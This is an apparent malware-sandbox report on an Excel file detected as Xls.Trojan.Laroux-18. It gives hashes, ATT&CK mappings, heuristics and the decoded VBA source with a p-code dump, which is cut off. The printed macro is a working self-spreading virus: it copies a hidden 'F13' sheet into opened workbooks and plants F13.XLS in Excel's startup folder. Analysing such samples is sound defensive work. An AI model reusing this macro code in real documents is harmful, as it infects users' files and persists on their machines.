Xls.Trojan.Laroux-18 — Office (OLE) malware analysis

Static analysis result for SHA-256 192e609375588cf6…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 41.0 KB
Created: 1999-02-08 09:24:15
Authoring application: Microsoft Excel
First seen: 2012-06-14
MD5: 1079219758f751f80c867e4bd7a48b7a
SHA-1: ec4e7a368d119fefdaa0a33a2175cb22d8752443
SHA-256: 192e609375588cf631b4d66e51c6a9f85fb73cfc80185d40ffb194721de970f4
Risk Score: 220

Malware Insights

Xls.Trojan.Laroux-18 · confidence 95%

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

This Excel file contains VBA macros, including an Auto_Open subroutine, which runs when the document is opened and is a common way to execute malicious code. The ClamAV detection 'Xls.Trojan.Laroux-18' strongly suggests a known malware family. The script attempts to copy itself and potentially to establish persistence by saving a file named 'F13.XLS' in the startup path.

Heuristics 4

  • ClamAV: Xls.Trojan.Laroux-18 (severity: critical; ID: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Xls.Trojan.Laroux-18
  • VBA macros detected (severity: medium; 2 related findings; ID: OLE_VBA_MACROS)
    Document contains VBA macro code
  • Auto_Open macro (severity: high; ID: OLE_VBA_AUTO)
    Auto_Open macro
  • Auto_Close macro (severity: high; ID: OLE_VBA_AUTOCLOSE)
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6057 bytes
SHA-256: b7b9d14710b784aa8fd7d8d42776fcd54fe4f491bea5d5ba416bd34195ab909a
Detection: ClamAV: Xls.Trojan.Laroux-18
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script)

Attribute VB_Name = "F13"






Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
    If Day(Now()) = 13 And Format(Now(), "ddd") = "Fri" Then
        MsgBox "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!" & Chr(13) & "!!! Friday thirteenth !!!!" _
               & Chr(13) & "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
    End If
    Application.OnSheetActivate = "chk_fls"
End Sub
Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
    Application.DisplayAlerts = False
    Workbooks("F13.XLS").Close savechanges:=False
End Sub
Sub chk_fls()
Attribute chk_fls.VB_ProcData.VB_Invoke_Func = " \n14"
 If Dir(Application.StartupPath & "\" & "F13.XLS") = "F13.XLS" Then p = 1 Else p = 0
 If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
 FCD = p + w * 10
    
 Application.ScreenUpdating = False
 N_FNM = ActiveWorkbook.Name
 Select Case FCD
    Case 1
     If Workbooks(N_FNM).Sheets(1).Name <> "F13" Then
        Workbooks("F13.XLS").Sheets("F13").Copy before:=Workbooks(N_FNM).Sheets(1)
        Workbooks(N_FNM).Sheets("F13").Visible = False
     End If
    
    Case 10
     Workbooks.Add
     Workbooks(N_FNM).Sheets("F13").Copy After:=Workbooks(ActiveWorkbook.Name).Sheets(1)
     
     Workbooks(ActiveWorkbook.Name).SaveAs FileName:=Application.StartupPath & "/" & "F13.XLS", FileFormat:=xlNormal _
        , Password:="", WriteResPassword:="", ReadOnlyRecommended:= _
        False, CreateBackup:=False
     Windows("F13.XLS").Visible = False
    
    Case 11
     Windows("F13.XLS").Visible = False
    Case Else
 End Select
 Application.OnSheetActivate = ""
 Application.ScreenUpdating = True
 Application.OnSheetActivate = "F13.XLS!chk_fls"
End Sub


' Processing file: /opt/analyzer/scan_staging/9089f55427004924a0c62a84aac149e8.bin
' ===============================================================================
' Module streams:
' _VBA_PROJECT_CUR/VBA/F13 - 3910 bytes
' Line #0:
' Line #1:
' Line #2:
' Line #3:
' Line #4:
' Line #5:
' Line #6:
' 	FuncDefn (Sub auto_open())
' Line #7:
' 	ArgsLd Now 0x0000 
' 	ArgsLd Day 0x0001 
' 	LitDI2 0x000D 
' 	Eq 
' 	ArgsLd Now 0x0000 
' 	LitStr 0x0003 "ddd"
' 	ArgsLd Format$ 0x0002 
' 	LitStr 0x0003 "Fri"
' 	Eq 
' 	And 
' 	IfBlock 
' Line #8:
' 	LineCont 0x0004 09 00 0F 00
' 	LitStr 0x0026 "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x001A "!!! Friday thirteenth !!!!"
' 	Concat 
' 	LitDI2 0x000D 
' 	ArgsLd Chr 0x0001 
' 	Concat 
' 	LitStr 0x0026 "!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!"
' 	Concat 
' 	ArgsCall MsgBox 0x0001 
' Line #9:
' 	EndIfBlock 
' Line #10:
' 	LitStr 0x0007 "chk_fls"
' 	Ld Application 
' 	MemSt OnSheetActivate 
' Line #11:
' 	EndSub 
' Line #12:
' 	FuncDefn (Sub auto_close())
' Line #13:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt DisplayAlerts 
' Line #14:
' 	LitVarSpecial (False)
' 	ParamNamed savechanges 
' 	LitStr 0x0007 "F13.XLS"
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemCall Close 0x0001 
' Line #15:
' 	EndSub 
' Line #16:
' 	FuncDefn (Sub chk_fls())
' Line #17:
' 	Ld Application 
' 	MemLd StartupPath 
' 	LitStr 0x0001 "\"
' 	Concat 
' 	LitStr 0x0007 "F13.XLS"
' 	Concat 
' 	ArgsLd Dir 0x0001 
' 	LitStr 0x0007 "F13.XLS"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	St p 
' 	Else 
' 	BoSImplicit 
' 	LitDI2 0x0000 
' 	St p 
' 	EndIf 
' Line #18:
' 	Ld ActiveWorkbook 
' 	MemLd Modules 
' 	MemLd Count 
' 	LitDI2 0x0000 
' 	Gt 
' 	If 
' 	BoSImplicit 
' 	LitDI2 0x0001 
' 	St w 
' 	Else 
' 	BoSImplicit 
' 	LitDI2 0x0000 
' 	St w 
' 	EndIf 
' Line #19:
' 	Ld p 
' 	Ld w 
' 	LitDI2 0x000A 
' 	Mul 
' 	Add 
' 	St FCD 
' Line #20:
' Line #21:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt ScreenUpdating 
' Line #22:
' 	Ld ActiveWorkbook 
' 	MemLd New 
' 	St N_FNM 
' Line #23:
' 	Ld FCD 
' 	SelectCase 
' Line #24:
' 	LitDI2 0x0001 
' 	Case 
' 	CaseDone 
' Line #25:
' 	LitDI2 0x0001 
' 	Ld N_FNM 
' 	ArgsLd Workbooks 0x0001 
' 	ArgsMemLd Sheets 0x0001 
' 	MemLd New 
' 	LitStr 0x0003 "F13"
' 	Ne 
' 	IfBlock 
' Line #26:
' 
... (truncated)